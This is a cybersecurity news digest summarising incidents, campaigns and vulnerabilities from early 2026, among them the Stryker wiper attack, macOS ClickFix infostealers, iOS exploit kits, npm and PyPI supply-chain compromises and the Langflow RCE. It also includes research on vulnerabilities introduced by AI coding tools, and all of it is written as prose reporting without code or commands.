The Iranian hacktivist group Handala—linked to Iran’s Ministry of Intelligence and Security (MOIS)—conducted a destructive wiper attack against Stryker, a U.S. Fortune 500 medical technology company, on March 11, 2026. The attack affected over 200,000 systems across 79 countries, disrupted operations in Ireland, and sent over 5,000 workers home. Handala claimed responsibility, citing retaliation for a U.S. missile strike. The attack leveraged Microsoft Intune to issue remote wipe commands and defaced Stryker’s Entra login page. Stryker confirmed the incident in an SEC filing and reported no evidence of data exfiltration. Recovery efforts prioritized restoring supply-chain systems. In a separate but related development, Handala breached the personal email account of FBI Director Kash Patel on March 28, 2026, and leaked historical emails from 2010 and 2019. The FBI acknowledged the targeting and stated the leaked data was not government-related. Handala operates under multiple monikers, including Banished Kitten and Void Manticore, and has integrated criminal tools such as Rhadamanthys stealer to enhance its operations. The group’s activities align with broader Iranian cyber operations targeting Western entities amid heightened geopolitical tensions, including destructive attacks, hack-and-leak campaigns, and psychological influence operations. U.S. authorities have seized multiple domains linked to Handala and offered a $10 million reward for information on group members.

A new macOS-targeting infostealer named Infinity Stealer is being distributed via ClickFix CAPTCHA lures impersonating Cloudflare’s human verification, leading victims to execute a base64-obfuscated Bash command that fetches and runs a Nuitka-compiled Python payload. The attack abuses a fake CAPTCHA on update-check[.]com to bypass OS defenses and install a Mach-O loader that extracts a zstd-compressed archive containing the stealer. Infinity Stealer harvests browser credentials, macOS Keychain entries, cryptocurrency wallets, and plaintext secrets from developer files, and exfiltrates data via HTTP POST to C2 with Telegram notifications to operators.

Apple has begun sending Lock Screen notifications to iPhones and iPads running outdated iOS versions warning users of active web-based exploits and urging immediate updates. This follows Apple’s support document alerting users to exploit kits like Coruna (targeting iOS 13–18.7) and Darksword (targeting iOS 18.4–18.7) and the public leak of a newer Darksword version on GitHub. Coruna and Darksword are now independently confirmed as closely related frameworks with shared origins in the 2019–2023 Operation Triangulation campaign, reinforcing attribution to Russian threat actor UNC6353 and associated groups. Coruna has evolved from a precision espionage tool into a mass-exploitation framework with 23 exploits across five chains, while Darksword is now publicly leaked and targets iOS 18.7. Apple has patched all exploited flaws in recent releases (18.7.3, 26.2, 26.3.1), and CISA has mandated federal agencies patch three DarkSword-linked vulnerabilities (CVE-2025-31277, CVE-2025-43510, CVE-2025-43520) by April 3, 2026. Campaigns linked to UNC6353, UNC6748, and Turkish vendor PARS Defense highlight the growing commoditization of iOS exploitation tools and elevated risk to end-users globally.

GlassWorm has escalated into a multi-stage framework combining remote access trojans (RATs), data theft, and hardware wallet phishing, with the latest iteration leveraging Solana dead drops for C2, a novel browser extension for surveillance, and a shift into the Model Context Protocol (MCP) ecosystem. The campaign now delivers a .NET binary that targets Ledger and Trezor devices by masquerading as configuration errors and prompting users to input recovery phrases, while a Websocket-based JavaScript RAT exfiltrates browser data, executes arbitrary code, and deploys HVNC or SOCKS proxy modules. The malware uses a Google Chrome extension disguised as Google Docs Offline to perform session surveillance on cryptocurrency platforms like Bybit and harvest extensive browser data. Additionally, threat actors have begun distributing malicious payloads via npm packages impersonating the WaterCrawl MCP server, marking GlassWorm’s first confirmed incursion into the AI-assisted development ecosystem. The GlassWorm campaign remains a persistent supply chain threat impacting multiple ecosystems including npm, PyPI, GitHub, and Open VSX. Since its emergence in October 2025, the campaign has evolved from invisible Unicode steganography in VS Code extensions to a sophisticated multi-vector operation spanning 151 compromised GitHub repositories and dozens of malicious npm packages. The threat actor, assessed to be Russian-speaking, continues to avoid infecting Russian-locale systems and leverages Solana blockchain transactions as dead drops for C2 resolution. Recent developments include the ForceMemo offshoot that force-pushes malicious code into Python repositories, the abuse of extensionPack and extensionDependencies for transitive malware delivery, and the introduction of Rust-based implants targeting developer toolchains. The Eclipse Foundation and Open VSX have implemented security measures such as token revocation and automated scanning, but the threat actors have repeatedly adapted by rotating infrastructure, obfuscating payloads, and expanding into new ecosystems like MCP servers. A new large-scale social engineering campaign has emerged, using fake VS Code security alerts posted in GitHub Discussions to distribute malware. The campaign automates posts across thousands of repositories using low-activity accounts, triggering GitHub email notifications with fake vulnerability advisories containing realistic CVE references. Links in these posts redirect victims through a cookie-driven chain to drnatashachinn[.]com, where a JavaScript reconnaissance payload profiles targets before delivering additional malicious payloads. This operation represents a coordinated, large-scale effort targeting developers as part of the broader GlassWorm malware campaign.

TeamPCP has escalated its multi-vector CanisterWorm campaign into a broader geopolitically targeted operation, now compromising trusted PyPI packages to deliver credential-stealing malware with automated execution mechanisms. The group has targeted the LiteLLM and Telnyx Python packages (versions 1.82.7, 1.82.8, 4.87.1, and 4.87.2), embedding malware that harvests SSH keys, cloud credentials, Kubernetes secrets, database credentials, cryptocurrency wallets, TLS/SSL private keys, and bash history files before exfiltrating data to attacker-controlled infrastructure and establishing persistent backdoors. The campaign began as a supply-chain attack involving 47 compromised npm packages and the @teale.io/eslint-config variant, leveraging ICP canisters for decentralized C2 and persistence via masqueraded systemd services. It escalated to include GitHub repository hijacking (e.g., Aqua Security), Docker Hub compromise, and deployment of an infostealer, then pivoted to targeting CI/CD pipelines directly via GitHub Actions workflows (e.g., Checkmarx, Trivy) using stolen credentials. TeamPCP now compromises GitHub Actions workflows and Open VSX extensions to deploy the TeamPCP Cloud stealer, while refining destructive payloads targeting Iranian systems in Kubernetes environments with time-zone/locale-based wipers. Recent compromises of LiteLLM and Telnyx demonstrate rapid iteration and maturation of supply chain attack methodology, with evidence suggesting collaboration with the Vectr ransomware group for follow-on ransomware operations.

Enterprise Governance, Risk, and Compliance (GRC) teams equipped with agentic AI tools are confronting an operational identity crisis as autonomous agents assume core workflows such as evidence collection, control monitoring, and audit preparation. The transition exposes a long-standing misalignment between traditional GRC roles—centered on operational execution—and the profession’s intended purpose: strategic risk insight and organizational protection. Practitioners report reluctance not due to technological limitations, but because the relinquishing of operations-based tasks challenges their professional identity and value proposition. Organizations progressing toward agentic GRC are redefining practitioner roles toward judgment-driven risk leadership, leveraging years of accrued expertise to define risk appetite, validate control efficacy, and interpret business context into compliance logic.

A design flaw in Open VSX’s pre-publish scanning pipeline enabled malicious Visual Studio Code (VS Code) extensions to bypass security vetting and become publicly available in the registry. The issue stemmed from a single boolean return value that conflated two distinct states: absence of configured scanners and scanner job failures. Under load, scanner failures (e.g., due to exhausted database connection pools) were misinterpreted as "no scanners configured," causing the system to mark extensions as passed and activate them immediately. This affected both the initial publish flow and a recovery service designed to retry failed scans. An attacker with a standard publisher account could exploit the flaw by flooding the publish endpoint to exhaust the database connection pool, preventing scan jobs from enqueuing and allowing malicious extensions to evade detection. The flaw was patched in Open VSX version 0.32.0 on March 3, 2026, following disclosure on February 8, 2026.

Google has accelerated the timeline for post-quantum cryptography (PQC) migration, warning that traditional encryption methods could become obsolete as early as 2029 due to quantum computing advancements. The 'Harvest Now, Decrypt Later' (HNDL) strategy remains a critical threat, with adversaries storing encrypted data for future decryption. Organizations must urgently adopt PQC to secure long-term sensitive data, with Google’s Android 17 integrating PQC digital signature protection in alignment with NIST standards. Regulatory and industry timelines, including those from the NSA and NCSC, remain aligned around 2033–2035, but Google’s 2029 deadline underscores the need for immediate action.

The European Commission is investigating a second breach, this time involving its Amazon cloud infrastructure where a threat actor gained access to at least one account managing cloud resources. The attacker stole over 350 GB of data, including databases and employee information, and plans to leak the data online without extortion intent. This incident follows the January 30, 2026 breach of the Commission’s mobile device management platform, which was linked to Ivanti EPMM vulnerabilities and contained within 9 hours. The compromised data in that incident included staff names, phone numbers, and business email addresses. The Commission has not disclosed details of the cloud breach but confirmed its cybersecurity incident response team is investigating. The attacks coincide with the Commission’s January 20 proposal for new cybersecurity legislation to strengthen defenses against state-backed actors and cybercrime groups targeting Europe’s critical infrastructure.

The geopolitical landscape has shifted from an era of relative stability under Pax Americana to one where technology is weaponized and cyber operations are integral to state power projection. State-linked actors, particularly China- and Russia-aligned groups, are intensifying campaigns targeting critical infrastructure, telecommunications, and government networks with long-dwell access, stealthy backdoors, and operational technology (OT) compromise. Non-state actors, including hacktivists and cybercriminals, have aligned with geopolitical agendas, executing disruptive operations that blur the line between activism, crime, and statecraft, often with physical consequences. Cyber extortion remains a dominant threat, driven by commoditized attack ecosystems and persistent failures in basic cyber hygiene, despite increased law-enforcement disruption efforts.

An international anti-piracy coalition led by the Alliance for Creativity and Entertainment (ACE) disrupted the AnimePlay anime streaming platform, which allegedly served over 5 million registered users predominantly in Indonesia. ACE seized control of the platform’s infrastructure, including the application, 15 associated domains, backend code repositories, hosting environments, and related digital assets, rendering the service inoperable. The takedown included over 60 terabytes of infringing anime content and the surrender of backend systems, advertising tools, and 29 GitHub repositories containing full source code by the platform’s operator. The action follows ACE’s recent dismantling of Photocall, a piracy platform with 26 million annual users, and reflects ongoing global enforcement against large-scale illegal streaming services.

Microsoft released KB5079391, a non-security preview cumulative update for Windows 11 versions 24H2 and 25H2, introducing toggle functionality for Smart App Control without OS reinstallation and multiple display reliability improvements. The update, part of Microsoft’s end-of-month non-security preview schedule, enables users to enable or disable Smart App Control through Windows Security settings, expanding accessibility beyond clean installations. Additionally, it adds support for monitors reporting refresh rates exceeding 1000 Hz, native USB4 monitor connections, and improved HDR reliability. The optional update targets builds 26200.8116 for 25H2 and 26100.8116 for 24H2, addressing performance, stability, and user interface refinements.

The Dutch National Police (Politie) confirmed a phishing attack resulted in a limited security breach, with attackers' access blocked shortly after detection by the Security Operations Center. The incident did not expose or access citizens' data or investigative information, and a criminal investigation has been launched. The timing of detection and potential exposure of employees' data remain undisclosed. This follows a prior 2024 breach attributed to a state actor, which stole work-related and private contact information for police officers. Enhanced security measures, including two-factor authentication and continuous monitoring, were implemented post-2024 but did not prevent the recent phishing incident.

A threat actor exploited vulnerabilities in Ajax Amsterdam’s IT systems to access limited fan data and manipulate ticket assignments and stadium bans. The incident affected a few hundred individuals, with fewer than 20 stadium bans compromised, including names, email addresses, and dates of birth. The attacker demonstrated the ability to reassign season tickets and modify existing stadium bans before disclosing the flaws to media outlets. The club has patched vulnerabilities, engaged external investigators, and notified Dutch authorities. No evidence of data leakage has been identified.

The total number of major operational technology (OT) cyber incidents causing physical consequences decreased by 25% in 2025, reversing a seven-year upward trend. Major OT cyberattacks fell from 76 in 2024 to 57 in 2025 according to Waterfall Security Solutions’ annual report, marking the first decline since 2018. The reduction contrasts with historical increases driven by ransomware and exposed industrial control systems, though many of the remaining 2025 incidents remained severe despite lower technical sophistication. The shift raises questions about underlying drivers, including improved defenses, underreporting due to legal risks, or fluctuations in ransomware ecosystem dynamics.

The U.S. Federal Communications Commission (FCC) has expanded its Covered List to prohibit the sale of new consumer-grade routers manufactured outside the United States, citing unacceptable national security risks. The ban targets 'consumer-grade' routers as defined in NIST Internal Report 8425A, while permitting continued operation of existing routers and maintaining imports for previously authorized foreign-manufactured models. The decision follows a March 20 National Security Determination identifying severe supply-chain vulnerabilities in foreign-made routers. Exemptions are strictly limited to Department of Defense or Department of Homeland Security drone and surveillance systems, with no blanket exclusions for foreign-made consumer routers. Existing hardware and U.S.-manufactured devices like Starlink routers remain unaffected. Critics warn the policy may leave consumers and businesses reliant on older, less secure routers as replacement markets shrink and compliance costs rise, potentially increasing long-term exposure to operational vulnerabilities rather than reducing them.

Security researchers have demonstrated 76 zero-day vulnerabilities in automotive systems during Pwn2Own Automotive 2026, earning $1,047,000 in cash awards. Affected systems include in-vehicle infotainment (IVI) units, EV chargers, and automotive-grade Linux, with exploits targeting Tesla, Sony, ChargePoint, and other vendors. The competition, held in Tokyo from January 21 to 23, 2026, highlighted the persistent insecurity of IT and OT components in vehicles, particularly aftermarket IVI systems and charging infrastructure. The contest revealed that EV chargers, despite improvements, retain a large attack surface, and banned previously known unpatched vulnerabilities from infotainment systems. Vendors have 90 days to develop and release security fixes before disclosure. Team Fuzzware.io secured the top prize with $215,000, followed by Team DDOS ($100,750) and Synacktiv ($85,000). Experts at RSAC 2026 emphasized that modern vehicles are effectively 'computers on wheels,' with attack surfaces expanding alongside connectivity and autonomous driving capabilities. The automotive industry continues to grapple with securing complex systems reliant on millions of lines of code, often developed by disparate suppliers without deep cybersecurity expertise. Regulatory frameworks like UN Regulation No. 155 now mandate cybersecurity assessments and secure development practices for vehicles across 63 countries.

CISA formally confirmed active exploitation of the Langflow unauthenticated RCE vulnerability (CVE-2026-33017) on March 26, 2026, adding it to the Known Exploited Vulnerabilities (KEV) catalog and mandating U.S. federal agencies to apply mitigations or stop using the product by April 8, 2026. Threat actors exploited the flaw within 20–24 hours of its March 17, 2026 disclosure, progressing from automated scanning to staged Python payload delivery and credential harvesting (including .env and .db files) despite the absence of public PoC code. The vulnerability, with a CVSS score of 9.3, affects all Langflow versions prior to and including 1.8.1 and stems from an unsandboxed exec() call in the /api/v1/build_public_tmp/{flow_id}/flow endpoint. CISA did not attribute exploitation to ransomware actors but emphasized the risk to AI workflows given Langflow’s widespread adoption, including 145,000 GitHub stars. Endor Labs reported that attackers likely reverse-engineered exploits from the advisory details, underscoring the accelerating weaponization timeline. Mitigation guidance includes upgrading to version 1.9.0+ or disabling the vulnerable endpoint, restricting internet exposure, monitoring outbound traffic, and rotating all associated credentials.

A China-nexus threat group, tracked as Red Menshen (aka Earth Bluecrow, DecisiveArchitect, Red Dev 18), has conducted a multi-year espionage campaign targeting telecom providers in the Middle East and Asia by deploying stealthy Linux kernel-level implants. The adversary abuses Berkeley Packet Filter (BPF) functionality to embed passive backdoors (BPFDoor) that activate via crafted network packets, avoiding detectable listeners or C2 channels. Initial access is obtained via internet-facing edge services (e.g., VPNs, firewalls) from vendors including Ivanti, Cisco, Juniper, Fortinet, VMware, Palo Alto, and Apache Struts. Post-exploitation includes deployment of frameworks like CrossC2 and Sliver, alongside credential harvesting tools, enabling lateral movement. BPFDoor’s functionality extends to telecom-native protocols (e.g., SCTP), potentially granting visibility into subscriber behavior, location tracking, and surveillance of high-value targets. A newly documented variant enhances evasion by concealing trigger packets within legitimate HTTPS traffic at fixed byte offsets and introducing ICMP-based lightweight communication between infected hosts.

Researchers at Georgia Tech’s Systems Software & Security Lab (SSLab) report a significant increase in vulnerabilities directly introduced by AI coding tools, with at least 35 new CVE entries disclosed in March 2026 alone—up from six in January and 15 in February. The findings, part of the Vibe Security Radar project launched in May 2025, track flaws across multiple public advisories (NVD, GHSA, OSV, RustSec) and confirm 74 cases where AI tool signatures (e.g., co-author tags, bot emails) were present in vulnerability-introducing commits. Anthropic’s Claude Code is the most frequently identified tool, though underreporting is suspected due to metadata stripping and lack of traces in tools like GitHub Copilot.

A critical Oracle WebLogic remote code execution (RCE) vulnerability, tracked as CVE-2026-21962 with CVSS score 10.0, underwent rapid weaponization within hours of public exploit code release in January 2026. Automated scanning and exploitation campaigns leveraging the flaw were detected targeting internet-exposed WebLogic servers globally, with the first exploitation attempt recorded on January 22, 2026—the same day exploit code was published. Threat actors predominantly utilized rented virtual private servers from mainstream cloud providers to conduct attacks. The observed activity underscores the immediate operational risk posed by newly disclosed high-severity WebLogic vulnerabilities and highlights continued reliance on long-standing, known-vulnerable endpoints for mass exploitation.

A newly identified EtherRAT campaign employs Ethereum smart contracts to host and rotate command-and-control (C2) infrastructure, evading traditional takedown mechanisms. The malware, observed in a March 2026 retail sector incident response, delivers a Node.js-based backdoor after initial access via ClickFix attacks and Microsoft Teams–based IT support scams. Once deployed, EtherRAT exfiltrates system data, steals cryptocurrency wallets and cloud credentials, and blends malicious traffic with legitimate CDN requests. The attack chain includes obfuscated scripts, encrypted payloads, and Windows registry persistence, with C2 addresses retrieved dynamically from Ethereum smart contracts via public RPC endpoints. Operators can update C2 infrastructure by writing new data to contracts, enabling low-cost retooling and sustained access.

A study by Sonatype analyzing 258,000 AI-generated dependency upgrade recommendations across Maven Central, npm, PyPI, and NuGet from June to August 2025 revealed that frontier AI models—including GPT-5.2, Claude Sonnet 3.7/4.5, Claude Opus 4.6, and Gemini 2.5 Pro/3 Pro—frequently produce hallucinated or incorrect upgrade paths, security fixes, and version recommendations. Nearly 28% of recommendations from earlier models were hallucinations, while even improved frontier models introduced faulty advice, leaving critical and high-severity vulnerabilities unresolved in production environments. The issue stems from the models’ lack of real-time dependency, vulnerability, compatibility, and enterprise policy context, leading to wasted developer time, unresolved exposures, and increased technical debt. Notably, some recommendations introduced known vulnerabilities into AI tooling stacks themselves, exacerbating risk within the models’ own infrastructure.

Threat actors are conducting a phishing campaign targeting TikTok for Business accounts, using Cloudflare-hosted reverse proxy pages to harvest credentials and session cookies, bypassing two-factor authentication. The campaign uses domains registered on March 24 via NiceNIC and hosted on a Google Storage bucket, impersonating TikTok for Business and Google Careers pages. Victims are lured via a Google Storage redirect with Cloudflare Turnstile bot protection to malicious pages that request email validation before presenting a fake login interface. Impact includes potential account takeover, ad fraud, malware distribution, and cryptocurrency scams leveraging compromised business accounts.

Meta has introduced several new features for WhatsApp, including AI-powered message drafting and image retouching, multi-account support on iOS, chat history transfer between iOS and Android, and enhanced anti-scam protections. The AI features operate under a privacy model called Private Processing, which ensures message content remains inaccessible to Meta or WhatsApp. Additionally, the update includes tools for media file management and parental controls for pre-teens. These changes aim to improve usability, privacy, and security across the platform.

Modern fraud attacks follow structured, multi-stage chains where different tools and operators handle each phase, from automated signups to account takeovers and monetization. Attackers rotate infrastructure and mix tactics to evade single-signal detection, often using aged or compromised credentials and residential proxies to appear legitimate. Fraudsters blend automated bot traffic with human-operated sessions, exploiting gaps between siloed defenses such as IP reputation, email, device fingerprinting, and identity verification. This coordinated approach enables credential stuffing, synthetic identity fraud, and high-value transaction abuse, with attackers adapting tools as they move from signup to monetization. Effective mitigation requires correlating hundreds or thousands of signals—IP, device, identity, and behavior—across the entire attack lifecycle to detect coordinated abuse patterns rather than isolated anomalies.

AI has rapidly become a central capability for both cyber threat actors and defenders, with criminals leveraging it to enhance malware development, automate reconnaissance, and scale phishing and social engineering across languages and platforms. Corporate security leaders now prioritize AI investments in response, while threat actors use publicly available agentic AI tools to conduct autonomous penetration testing-style attacks. Concerns are rising that AI will fuel a sustained increase in both the volume and sophistication of threats across a broader threat actor base, though AI is also positioned as a critical enabler for rapid detection and automated defense.

Russian law enforcement arrested a Taganrog resident suspected of founding and administering the LeakBase cybercrime forum in the Rostov region on March 26, 2026. The forum, active since 2021 and previously supported by the ARES threat group, served as a major hub for cybercriminals to trade stolen data, hacking tools, and related services, accumulating over 142,000 members after the Breached forum’s closure in March 2023. The arrest follows a coordinated international takedown codenamed Operation Leak, executed by law enforcement agencies across 15 countries including the U.S., U.K., and multiple EU states, resulting in approximately 100 enforcement actions, including raids, interviews, arrests, and domain seizure.

OpenAI introduced a new Safety Bug Bounty program on March 26, 2026, hosted on Bugcrowd, to incentivize researchers to report AI abuse and safety risks in its products. The program targets scenarios such as agentic risks (e.g., prompt injection, data exfiltration, MCP abuse), integrity violations (e.g., bypassing anti-automation controls, evading account restrictions), and proprietary information exposure. It complements OpenAI’s existing Security Bug Bounty, which since April 2023 has rewarded 409 security vulnerabilities.

An Armenian national, Hambardzum Minasyan, was extradited to the United States to face criminal charges for allegedly administering infrastructure supporting RedLine, a prolific infostealer malware operation. Minasyan is accused of registering virtual private servers, domains, and cryptocurrency accounts used by the RedLine gang, including for receiving affiliate payments and distributing malware. He allegedly managed command-and-control servers and administrative panels while providing support to affiliates and conspiring to steal financial data. If convicted, he faces up to 30 years in prison on charges including access device fraud and money laundering conspiracy.